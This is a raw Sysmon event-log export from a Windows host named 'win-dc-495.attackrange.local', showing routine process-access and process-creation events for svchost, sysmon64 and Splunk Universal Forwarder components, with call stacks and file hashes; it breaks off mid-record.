13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9057-6005-1801-00000000A301}4220C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9057-6005-1801-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:47.207{59A5CD1D-9057-6005-1801-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.785{59A5CD1D-9058-6005-1A01-00000000A301}10043504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9058-6005-1A01-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:42:48.629{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9058-6005-1A01-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.629{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9058-6005-1A01-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.630{59A5CD1D-9058-6005-1A01-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:42:48.176{59A5CD1D-9058-6005-1901-00000000A301}11961372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program 